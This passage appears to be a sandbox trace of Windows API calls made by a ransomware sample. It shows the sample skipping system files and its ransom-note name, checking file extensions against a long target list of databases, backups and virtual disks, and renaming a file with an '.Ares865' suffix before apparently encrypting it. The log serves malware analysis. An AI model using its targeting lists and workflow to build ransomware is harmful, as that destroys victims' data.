lpString2="rsd") returned -1 [0085.727] lstrlenW (lpString="sas7bdat") returned 8 [0085.727] lstrcmpiW (lpString1="ints.ico", lpString2="sas7bdat") returned -1 [0085.727] lstrlenW (lpString="sbf") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.727] lstrlenW (lpString="scx") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.727] lstrlenW (lpString="sdb") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.727] lstrlenW (lpString="sdc") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.727] lstrlenW (lpString="sdf") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.727] lstrlenW (lpString="sis") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.727] lstrlenW (lpString="spq") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.727] lstrlenW (lpString="te") returned 2 [0085.727] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.727] lstrlenW (lpString="teacher") returned 7 [0085.727] lstrcmpiW (lpString1="nts.ico", lpString2="teacher") returned -1 [0085.727] lstrlenW (lpString="tmd") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.727] lstrlenW (lpString="tps") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.727] lstrlenW (lpString="trc") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.727] lstrlenW (lpString="trc") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.727] lstrlenW (lpString="trm") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0085.727] lstrlenW (lpString="udb") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.727] lstrlenW (lpString="udl") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.727] lstrlenW (lpString="usr") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.727] lstrlenW (lpString="v12") returned 3 [0085.727] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.728] lstrlenW (lpString="vis") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.728] lstrlenW (lpString="vpd") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.728] lstrlenW (lpString="vvv") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.728] lstrlenW (lpString="wdb") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.728] lstrlenW (lpString="wmdb") returned 4 [0085.728] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0085.728] lstrlenW (lpString="wrk") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.728] lstrlenW (lpString="xdb") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.728] lstrlenW (lpString="xld") returned 3 [0085.728] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.728] lstrlenW (lpString="xmlff") returned 5 [0085.728] lstrcmpiW (lpString1="s.ico", lpString2="xmlff") returned -1 [0085.728] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.Ares865") returned 61 [0085.728] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.ares865"), dwFlags=0x1) returned 1 [0085.729] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.730] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=348974) returned 1 [0085.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.730] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.731] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.731] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.731] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x55630, lpName=0x0) returned 0x15c [0085.732] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x55630) returned 0x420000 [0085.840] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.841] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.841] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.841] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0085.844] CloseHandle (hObject=0x15c) returned 1 [0085.845] CloseHandle (hObject=0x118) returned 1 [0085.845] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.845] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.845] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.846] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0085.846] lstrcmpiW (lpString1="MySite.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.846] lstrcmpiW (lpString1="MySite.ico", lpString2="aoldtz.exe") returned 1 [0085.846] lstrcmpiW (lpString1="MySite.ico", lpString2=".") returned 1 [0085.846] lstrcmpiW (lpString1="MySite.ico", lpString2="..") returned 1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="windows") returned -1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="bootmgr") returned 1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="temp") returned -1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="pagefile.sys") returned -1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="boot") returned 1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="ids.txt") returned 1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="ntuser.dat") returned -1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="perflogs") returned -1 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2="MSBuild") returned 1 [0085.847] lstrlenW (lpString="MySite.ico") returned 10 [0085.847] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0085.847] lstrcpyW (in: lpString1=0x2cce448, lpString2="MySite.ico" | out: lpString1="MySite.ico") returned="MySite.ico" [0085.847] lstrlenW (lpString="MySite.ico") returned 10 [0085.847] lstrlenW (lpString="Ares865") returned 7 [0085.847] lstrcmpiW (lpString1="ite.ico", lpString2="Ares865") returned 1 [0085.847] lstrlenW (lpString=".dll") returned 4 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2=".dll") returned 1 [0085.847] lstrlenW (lpString=".lnk") returned 4 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2=".lnk") returned 1 [0085.847] lstrlenW (lpString=".ini") returned 4 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2=".ini") returned 1 [0085.847] lstrlenW (lpString=".sys") returned 4 [0085.847] lstrcmpiW (lpString1="MySite.ico", lpString2=".sys") returned 1 [0085.847] lstrlenW (lpString="MySite.ico") returned 10 [0085.847] lstrlenW (lpString="bak") returned 3 [0085.847] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.847] lstrlenW (lpString="ba_") returned 3 [0085.847] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.847] lstrlenW (lpString="dbb") returned 3 [0085.847] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.847] lstrlenW (lpString="vmdk") returned 4 [0085.847] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.847] lstrlenW (lpString="rar") returned 3 [0085.847] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.847] lstrlenW (lpString="zip") returned 3 [0085.847] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.848] lstrlenW (lpString="tgz") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.848] lstrlenW (lpString="vbox") returned 4 [0085.848] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.848] lstrlenW (lpString="vdi") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.848] lstrlenW (lpString="vhd") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.848] lstrlenW (lpString="vhdx") returned 4 [0085.848] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.848] lstrlenW (lpString="avhd") returned 4 [0085.848] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.848] lstrlenW (lpString="db") returned 2 [0085.848] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.848] lstrlenW (lpString="db2") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.848] lstrlenW (lpString="db3") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.848] lstrlenW (lpString="dbf") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.848] lstrlenW (lpString="mdf") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.848] lstrlenW (lpString="mdb") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.848] lstrlenW (lpString="sql") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.848] lstrlenW (lpString="sqlite") returned 6 [0085.848] lstrcmpiW (lpString1="te.ico", lpString2="sqlite") returned 1 [0085.848] lstrlenW (lpString="sqlite3") returned 7 [0085.848] lstrcmpiW (lpString1="ite.ico", lpString2="sqlite3") returned -1 [0085.848] lstrlenW (lpString="sqlitedb") returned 8 [0085.848] lstrcmpiW (lpString1="Site.ico", lpString2="sqlitedb") returned -1 [0085.848] lstrlenW (lpString="xml") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.848] lstrlenW (lpString="$er") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.848] lstrlenW (lpString="4dd") returned 3 [0085.848] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.849] lstrlenW (lpString="4dl") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.849] lstrlenW (lpString="^^^") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.849] lstrlenW (lpString="abs") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.849] lstrlenW (lpString="abx") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.849] lstrlenW (lpString="accdb") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accdb") returned 1 [0085.849] lstrlenW (lpString="accdc") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accdc") returned 1 [0085.849] lstrlenW (lpString="accde") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accde") returned 1 [0085.849] lstrlenW (lpString="accdr") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accdr") returned 1 [0085.849] lstrlenW (lpString="accdt") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accdt") returned 1 [0085.849] lstrlenW (lpString="accdw") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accdw") returned 1 [0085.849] lstrlenW (lpString="accft") returned 5 [0085.849] lstrcmpiW (lpString1="e.ico", lpString2="accft") returned 1 [0085.849] lstrlenW (lpString="adb") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.849] lstrlenW (lpString="adb") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.849] lstrlenW (lpString="ade") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.849] lstrlenW (lpString="adf") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.849] lstrlenW (lpString="adn") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.849] lstrlenW (lpString="adp") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.849] lstrlenW (lpString="alf") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.849] lstrlenW (lpString="ask") returned 3 [0085.849] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.849] lstrlenW (lpString="btr") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.850] lstrlenW (lpString="cat") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.850] lstrlenW (lpString="cdb") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.850] lstrlenW (lpString="ckp") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.850] lstrlenW (lpString="cma") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.850] lstrlenW (lpString="cpd") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.850] lstrlenW (lpString="dacpac") returned 6 [0085.850] lstrcmpiW (lpString1="te.ico", lpString2="dacpac") returned 1 [0085.850] lstrlenW (lpString="dad") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.850] lstrlenW (lpString="dadiagrams") returned 10 [0085.850] lstrlenW (lpString="daschema") returned 8 [0085.850] lstrcmpiW (lpString1="Site.ico", lpString2="daschema") returned 1 [0085.850] lstrlenW (lpString="db-journal") returned 10 [0085.850] lstrlenW (lpString="db-shm") returned 6 [0085.850] lstrcmpiW (lpString1="te.ico", lpString2="db-shm") returned 1 [0085.850] lstrlenW (lpString="db-wal") returned 6 [0085.850] lstrcmpiW (lpString1="te.ico", lpString2="db-wal") returned 1 [0085.850] lstrlenW (lpString="dbc") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.850] lstrlenW (lpString="dbs") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.850] lstrlenW (lpString="dbt") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.850] lstrlenW (lpString="dbv") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.850] lstrlenW (lpString="dbx") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.850] lstrlenW (lpString="dcb") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.850] lstrlenW (lpString="dct") returned 3 [0085.850] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.850] lstrlenW (lpString="dcx") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.851] lstrlenW (lpString="ddl") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.851] lstrlenW (lpString="dlis") returned 4 [0085.851] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.851] lstrlenW (lpString="dp1") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.851] lstrlenW (lpString="dqy") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.851] lstrlenW (lpString="dsk") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.851] lstrlenW (lpString="dsn") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.851] lstrlenW (lpString="dtsx") returned 4 [0085.851] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.851] lstrlenW (lpString="dxl") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.851] lstrlenW (lpString="eco") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.851] lstrlenW (lpString="ecx") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.851] lstrlenW (lpString="edb") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.851] lstrlenW (lpString="epim") returned 4 [0085.851] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.851] lstrlenW (lpString="fcd") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.851] lstrlenW (lpString="fdb") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.851] lstrlenW (lpString="fic") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.851] lstrlenW (lpString="flexolibrary") returned 12 [0085.851] lstrlenW (lpString="fm5") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.851] lstrlenW (lpString="fmp") returned 3 [0085.851] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.851] lstrlenW (lpString="fmp12") returned 5 [0085.851] lstrcmpiW (lpString1="e.ico", lpString2="fmp12") returned -1 [0085.852] lstrlenW (lpString="fmpsl") returned 5 [0085.852] lstrcmpiW (lpString1="e.ico", lpString2="fmpsl") returned -1 [0085.852] lstrlenW (lpString="fol") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.852] lstrlenW (lpString="fp3") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.852] lstrlenW (lpString="fp4") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.852] lstrlenW (lpString="fp5") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.852] lstrlenW (lpString="fp7") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.852] lstrlenW (lpString="fpt") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.852] lstrlenW (lpString="frm") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.852] lstrlenW (lpString="gdb") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.852] lstrlenW (lpString="gdb") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.852] lstrlenW (lpString="grdb") returned 4 [0085.852] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.852] lstrlenW (lpString="gwi") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.852] lstrlenW (lpString="hdb") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.852] lstrlenW (lpString="his") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.852] lstrlenW (lpString="ib") returned 2 [0085.852] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.852] lstrlenW (lpString="idb") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.852] lstrlenW (lpString="ihx") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.852] lstrlenW (lpString="itdb") returned 4 [0085.852] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.852] lstrlenW (lpString="itw") returned 3 [0085.852] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.852] lstrlenW (lpString="jet") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.853] lstrlenW (lpString="jtx") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.853] lstrlenW (lpString="kdb") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.853] lstrlenW (lpString="kexi") returned 4 [0085.853] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.853] lstrlenW (lpString="kexic") returned 5 [0085.853] lstrcmpiW (lpString1="e.ico", lpString2="kexic") returned -1 [0085.853] lstrlenW (lpString="kexis") returned 5 [0085.853] lstrcmpiW (lpString1="e.ico", lpString2="kexis") returned -1 [0085.853] lstrlenW (lpString="lgc") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.853] lstrlenW (lpString="lwx") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.853] lstrlenW (lpString="maf") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.853] lstrlenW (lpString="maq") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.853] lstrlenW (lpString="mar") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.853] lstrlenW (lpString="marshal") returned 7 [0085.853] lstrcmpiW (lpString1="ite.ico", lpString2="marshal") returned -1 [0085.853] lstrlenW (lpString="mas") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.853] lstrlenW (lpString="mav") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.853] lstrlenW (lpString="maw") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.853] lstrlenW (lpString="mdbhtml") returned 7 [0085.853] lstrcmpiW (lpString1="ite.ico", lpString2="mdbhtml") returned -1 [0085.853] lstrlenW (lpString="mdn") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.853] lstrlenW (lpString="mdt") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.853] lstrlenW (lpString="mfd") returned 3 [0085.853] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.853] lstrlenW (lpString="mpd") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.854] lstrlenW (lpString="mrg") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.854] lstrlenW (lpString="mud") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.854] lstrlenW (lpString="mwb") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.854] lstrlenW (lpString="myd") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.854] lstrlenW (lpString="ndf") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.854] lstrlenW (lpString="nnt") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.854] lstrlenW (lpString="nrmlib") returned 6 [0085.854] lstrcmpiW (lpString1="te.ico", lpString2="nrmlib") returned 1 [0085.854] lstrlenW (lpString="ns2") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.854] lstrlenW (lpString="ns3") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.854] lstrlenW (lpString="ns4") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.854] lstrlenW (lpString="nsf") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0085.854] lstrlenW (lpString="nv") returned 2 [0085.854] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.854] lstrlenW (lpString="nv2") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.854] lstrlenW (lpString="nwdb") returned 4 [0085.854] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.854] lstrlenW (lpString="nyf") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.854] lstrlenW (lpString="odb") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.854] lstrlenW (lpString="odb") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.854] lstrlenW (lpString="oqy") returned 3 [0085.854] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.855] lstrlenW (lpString="ora") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.855] lstrlenW (lpString="orx") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.855] lstrlenW (lpString="owc") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0085.855] lstrlenW (lpString="p96") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.855] lstrlenW (lpString="p97") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.855] lstrlenW (lpString="pan") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.855] lstrlenW (lpString="pdb") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.855] lstrlenW (lpString="pdm") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.855] lstrlenW (lpString="pnz") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.855] lstrlenW (lpString="qry") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.855] lstrlenW (lpString="qvd") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.855] lstrlenW (lpString="rbf") returned 3 [0085.855] lstrcmpiW (lpString1="ico", 